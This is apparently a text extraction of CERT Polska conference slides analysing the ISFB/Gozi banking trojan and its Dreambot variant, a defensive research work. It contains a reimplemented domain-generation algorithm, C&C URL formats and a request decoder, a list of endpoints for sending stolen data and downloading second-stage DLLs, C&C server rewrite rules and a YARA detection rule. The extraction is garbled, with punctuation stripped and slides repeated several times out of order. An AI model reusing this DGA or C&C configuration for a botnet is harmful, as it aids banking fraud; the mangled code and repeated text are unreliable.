SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
